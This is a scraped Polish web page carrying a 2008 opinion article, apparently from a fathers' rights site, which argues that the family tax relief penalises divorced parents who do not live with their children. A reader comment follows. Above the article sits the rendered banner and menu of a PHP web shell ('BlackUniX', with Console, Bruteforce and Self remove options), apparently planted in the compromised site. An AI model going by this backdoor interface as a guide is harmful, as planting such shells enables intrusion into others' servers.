W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-20 07:13:08
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.92.153.90
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Rozwodnicy dyskryminowani przez fiskusa!
18.04.2008.

Przepisy określające warunki korzystania z ulgi rodzinnej dyskryminują ojców. Jak wiadomo zdecydowana większość polskich dzieci po rozwodzie zamieszkuje z matką. wg Gazety Prawnej warunkiem odliczenia ulgi prorodzinnej jest faktyczne zamieszkiwanie dziecka z podatnikiem. Ten zapis rodzi wiele wątpliwości. Godzi w rozwiedzionych rodziców, których dzieci wyjechały na studia.


Rozwodnicy dyskryminowani!


Warunkiem odliczenia podatku dla rozwiedzionych rodziców w ramach ulgi prorodzinnej jest rzeczywiste zamieszkiwanie z dzieckiem w roku podatkowym. Nie dość, że państwo nie zapewnia żadnej egzekucji prawa do widzenia się z własnym dzieckiem po rozwodzie, to jeszcze dodatkowo karze rodziców, którzy nie mieszkają z dzieckiem, odbieraniem ulgi prorodzinnej. Co nie przeszkadza w egzekucji alimentów...


Przepisy dyskryminują osoby rozwiedzione.

Mimo że jak deklaruje ustawodawca, ulga rodzinna dotyczy także rozwiedzionych rodziców, ma dla nich dodatkowe wymagania.

W przypadku tzw. pełnych rodzin podatnik nie musi mieszkać z dzieckiem, żeby mieć prawo do ulgi. Natomiast w przypadku rozbitych rodzin, ulga uzależniona jest od faktycznego zamieszkiwania z dzieckiem!


Im dłużej u mnie tym wyższa ulga...


Eksperci, interpretując nowe prawo, twierdzą, że wysokość ulgi ma być proporcjonalna do okresu w którym dziecko zamieszkiwało z podatnikiem! Teraz dodatkowym argumentem w walce o dziecko będzie możliwość skorzystania z ulgi podatkowej. Krótko mówiąc, matki będą miały ewidentny interes w izolowaniu dzieci od ojców!

Trudno wyobrazić sobie lepszy sposób na podgrzewanie atmosfery. Państwo zamiast polityki prorodzinnej funduje nam kolejny pretekst do sporów o dzieci po rozwodzie!Na szczęście te przepisy budzą również wątpliwości ekspertów, którzy wskazują m.in. na ich niezgodność z zasadą równości opodatkowania. Przepisy te odmiennie regulują warunki, które muszą spełnić osoby pozostające w małżeństwie i te które wymagane są od osób rozwiedzionych.Miejmy nadzieję, że te pozorne niuanse, które jawnie godzą w zasady równości i co gorsza mogą przyczyniać się do zaostrzania sporów między byłymi małżonkami, zostaną szybko skorygowane. Trudno zrozumieć dlaczego fiskalna polityka prorodzinna miałaby promować rodziców mieszkających z dzieckiem, ignorując przy tym tych płacących alimenty.Źródło: Gazeta Prawna

 
« poprzedni artykuł   następny artykuł »

komentarze

tak zgadzam się z tym to jest podżeganie aby dzieci nie przebywały z rodzicem

Napisał Aleksander Karpiński, dzień 04/26/2008 o 23:09

 1 
Strona 1 z 1 ( 1 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:

Odwiedza nas 1 gość
20.06.2018.